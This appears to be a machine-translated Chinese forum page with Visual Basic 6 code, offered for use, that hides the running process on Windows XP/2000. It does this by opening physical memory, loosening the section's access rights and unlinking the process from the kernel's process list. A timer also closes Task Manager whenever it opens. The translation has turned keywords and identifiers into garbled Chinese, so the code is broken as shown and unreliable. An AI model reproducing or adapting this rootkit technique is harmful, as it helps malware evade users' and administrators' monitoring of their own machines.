私有聲明函數SendMessage Lib“user 32”別名“SendMessage a”(ByVal hwnd為Long,ByVal wMsg為Long,ByVal wParam為Long,lParam為Any)為Long
私有子窗體_Load()
選項顯式
私有常量STATUS _ INFO _ LENGTH _ MISMATCH = & amp;HC0000004
私有常量STATUS _ ACCESS _ DENIED = & ampHC0000022
私有常量STATUS _ INVALID _ HandLE = & ampHC0000008
私有常量ERROR _ SUCCESS = 0 & amp
私有常量SECTION _ MAP _ WRITE = & amp氘
私有常量SECTION _ MAP _ READ = & ampH4
私有常量READ _ CONTROL = & ampH20000
私有常量WRITE _ DAC = & ampH40000
私有常量NO_INHERITANCE = 0
私人常數DACL _安全_信息= & ampH4
私有聲明函數SetSecurityInfo Lib " advapi 32 . dll "(ByVal Handle為Long,ByVal ObjectType為SE_OBJECT_TYPE,ByVal SecurityInfo為Long,ppsidOwner為Long,ppsidGroup為Long,ppDacl為Any,ppSacl為Any)為Long
私有聲明函數GetSecurityInfo Lib " advapi 32 . dll "(ByVal Handle為Long,ByVal ObjectType為SE_OBJECT_TYPE,ByVal SecurityInfo為Long,ppsidOwner為Long,ppsidGroup為Long,ppDacl為Any,ppSacl為Any,ppSecurityDeor為Long)
私有聲明函數SetEntriesInAcl Lib " advapi 32 . dll "別名" SetEntriesInAcl "(ByVal ccountoexplicientries為Long,pListOfExplicitEntries為EXPLICIT_ACCESS,ByVal OldAcl為Long,NewAcl為Long)為Long
private Declare Sub BuildExplicitAccessWithName Lib " advapi 32 . dll "別名" BuildExplicitAccessWithNameA "(pExplicitAccess為EXPLICIT_ACCESS,ByVal pTrusteeName為String,ByVal AccessPermissions為Long,ByVal AccessMode為ACCESS_MODE,ByVal Inheritance為Long)
私有聲明Sub RtlInitUnicodeString Lib " NTDLL。DLL" (DestinationString為UNICODE_STRING,ByVal SourceString為Long)
私有聲明函數ZwOpenSection Lib "NTDLL。DLL" (SectionHandle壹樣長,ByVal DesiredAccess壹樣長,ObjectAttributes壹樣長)
私有聲明函數local free Lib " kernel 32 "(ByVal hMem As Any)壹樣長
私有聲明函數CloseHandle Lib " kernel 32 "(ByVal hObject As Long)
私有聲明函數MapViewOfFile Lib " kernel 32 "(ByVal hFileMappingObject為Long、ByVal dwDesiredAccess為Long、ByVal dwFileOffsetHigh為Long、ByVal dwFileOffsetLow為Long、ByVal dwNumberOfBytesToMap為Long)
私有聲明函數UnmapViewOfFile Lib " kernel 32 "(lpBaseAddress As Any)壹樣長
私有聲明子復制內存庫“kernel32”別名“RtlMoveMemory”(目標為任意,源為任意,ByVal長度為Long)
私有聲明函數GetVersionEx Lib "kernel32 "別名" GetVersionExA "(LpVersionInformation As OS versioninfo)為Long
私有類型OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion壹樣長
dwMinorVersion壹樣長
dwBuildNumber為Long
dwPlatformId壹樣長
szCSDVersion作為字符串* 128
結束類型
Private verinfo As OSVERSIONINFO
Private g_hNtDLL As Long
Private g _ pMapPhysicalMemory只要
Private g_hMPM As Long
作為字節的私有aByte(3)
Public Sub HideCurrentProcess()
在進程列表中隱藏當前應用程序進程。
Dim螺紋壹樣長,process壹樣長,fw壹樣長,bw壹樣長
Dim lOffsetFlink為Long,lOffsetBlink為Long,lOffsetPID為Long
verinfo . dwosversioninfosize = Len(verinfo)
if(GetVersionEx(ver info))& lt;& gt那麽0
如果verinfo.dwPlatformId = 2,則
如果verinfo.dwMajorVersion = 5,則
選擇Case verinfo.dwMinorVersion
案例0
lOffsetFlink = & amp哈0
lOffsetBlink = & ampHA4
lOffsetPID = & ampH9C
案例1
lOffsetFlink = & ampH88
lOffsetBlink = & ampH8C
lOffsetPID = & ampH84
結束選擇
如果…就會結束
如果…就會結束
如果…就會結束
If OpenPhysicalMemory & lt& gt那麽0
thread = get data(& amp;HFFDFF124)
process = get data(thread+& amp;H44)
fw = get data(process+lOffsetFlink)
bw = get data(process+lOffsetBlink)
SetData fw + 4,bw
SetData帶寬,fw
CloseHandle g_hMPM
如果…就會結束
末端接頭
private subset physicialmemorysectioncanbewrited(ByVal h section As Long)
Dim pDacl為Long
Dim pNewDacl壹樣長
變暗pSD為長
Dim dwRes壹樣長
Dim ea As EXPLICIT_ACCESS
GetSecurityInfo hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,pDacl,0,pSD
ea . grfacesspermissions = SECTION _ MAP _ WRITE
ea.grfAccessMode = GRANT_ACCESS
ea . grfinheritance = NO _ INHERITANCE
每TRUSTEE . TRUSTEE form = TRUSTEE _ IS _ NAME
每TRUSTEE . TRUSTEE type = TRUSTEE _ IS _ USER
每trustee . ptstrname = " CURRENT _ USER " & amp;vbNullChar
setentriesincl 1,ea,pDacl,pNewDacl
SetSecurityInfo hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,ByVal pNewDacl,0
清理:
本地自由pSD
LocalFree pNewDacl
末端接頭
私有函數OpenPhysicalMemory()為Long
長時間模糊狀態
Dim PhysmemString作為UNICODE_STRING
將屬性標註為OBJECT_ATTRIBUTES
RtlInitUnicodeString PhysmemString,StrPtr("\Device\PhysicalMemory ")
屬性。長度=長度(屬性)
屬性。根目錄= 0
屬性。object name = VarPtr(physmestring)
屬性。屬性= 0
屬性。SecurityDeor = 0
屬性。SecurityQualityOfService = 0
Status = ZwOpenSection(g_hMPM,SECTION_MAP_READ或SECTION_MAP_WRITE,屬性)
如果狀態=狀態訪問被拒絕,則
Status = ZwOpenSection(g_hMPM,READ_CONTROL或WRITE_DAC,屬性)
SetPhyscialMemorySectionCanBeWrited g _ hMPM
CloseHandle g_hMPM
Status = ZwOpenSection(g_hMPM,SECTION_MAP_READ或SECTION_MAP_WRITE,屬性)
如果…就會結束
Dim lDirectoty壹樣長
verinfo . dwosversioninfosize = Len(verinfo)
if(GetVersionEx(ver info))& lt;& gt那麽0
如果verinfo.dwPlatformId = 2,則
如果verinfo.dwMajorVersion = 5,則
選擇Case verinfo.dwMinorVersion
案例0
lDirectoty = & ampH30000
案例1
lDirectoty = & ampH39000
結束選擇
如果…就會結束
如果…就會結束
如果…就會結束
如果狀態= 0,則
g _ pmappphysicalmemory = MapViewOfFile(g _ hMPM,4,0,lDirectoty,& ampH1000)
If g _ pMapPhysicalMemory & lt& gt0然後打開PhysicalMemory = g_hMPM
如果…就會結束
結束功能
私有函數LinearToPhys(BaseAddress壹樣長,addr壹樣長)壹樣長
Dim VAddr壹樣長,PGDE壹樣長,PTE壹樣長,PAddr壹樣長
Dim lTemp As Long
VAddr = addr
復制內存aByte(0),VAddr,4
ltemp = fix(byteartlong(abyte)/(2 ^ 22))
PGDE =基址+ lTemp * 4
版權所有PGDE,ByVal PGDE,4
If (PGDE和1)& lt;& gt那麽0
PGDE和& ampH80
如果lTemp & lt& gt那麽0
PAddr = (PGDE和& ampHFFC00000) + (VAddr和& ampH3FFFFF)
其他
PGDE = MapViewOfFile(g_hMPM,4,0,PGDE和& ampHFFFFF000,和。H1000)
lTemp = (VAddr和& amph3ff 000)/(^路2號12)
PTE = PGDE + lTemp * 4
CopyMemory PTE,ByVal PTE,4
If (PTE和1)& lt;& gt那麽0
PAddr = (PTE和& ampHFFFFF000) + (VAddr和& ampHFFF)
UnmapViewOfFile PGDE
如果…就會結束
如果…就會結束
如果…就會結束
LinearToPhys = PAddr
結束功能
私有函數GetData(addr壹樣長)壹樣長
Dim phys壹樣長,tmp壹樣長,ret壹樣長
phys = LinearToPhys(g _ pmappphysicalmemory,addr)
tmp = MapViewOfFile(g_hMPM,4,0,phys和& ampHFFFFF000,和。H1000)
如果tmp & lt& gt那麽0
ret = tmp + ((phys和& ampHFFF) / (2 ^ 2)) * 4
復制記憶ret,ByVal ret,4
UnmapViewOfFile tmp
GetData = ret
如果…就會結束
結束功能
私有函數SetData(ByVal addr為Long,ByVal data為Long)為布爾值
Dim phys壹樣長,tmp壹樣長,x壹樣長
phys = LinearToPhys(g _ pmappphysicalmemory,addr)
tmp = MapViewOfFile(g_hMPM,SECTION_MAP_WRITE,0,phys和& ampHFFFFF000,和。H1000)
如果tmp & lt& gt那麽0
x = tmp + ((phys和& ampHFFF) / (2 ^ 2)) * 4
復制記憶ByVal x,數據,4
UnmapViewOfFile tmp
SetData = True
如果…就會結束
結束功能
私有函數byteartlong(inByte()As Byte)為Double
將I標註為整數
對於I = 0到3
byteartlong = byteartlong+inByte(I)*(& amp;H100 ^ I)
接下來我
結束功能
結束功能
私有子定時器1_Timer()
HW = FindWindow (vbnullstring,“Windows任務管理器”)
發送消息硬件& ampH10,0
發送鍵" % "
我。SetFocus
末端接頭
太恐怖了~ ~ ~差點拿不回來。
如果不是在VB中運行,真不知道該怎麽退出。
如果窗體的樣式設置為無,啟動狀態設置為最大化,會更酷。
如果擔心不能退休,可以這樣做:
Private Sub Form_KeyDown(KeyCode為整數,Shift為整數)
如果KeyCode = Asc("I "),則結束
末端接頭
然後妳壹按“I”鍵就可以退出了。
隱藏XP/2K系統中進程的VB代碼
屬性VB_Name = "modHideProcess "
-
模塊名稱:modHideProcess.bas
'
模塊功能:在XP/2K任務管理器的進程列表中隱藏當前進程。
'
用法:直接調用HideCurrentProcess()
'
模塊作者:從網上檢索,原作者不詳。
'
修訂日期:2006年8月26日
-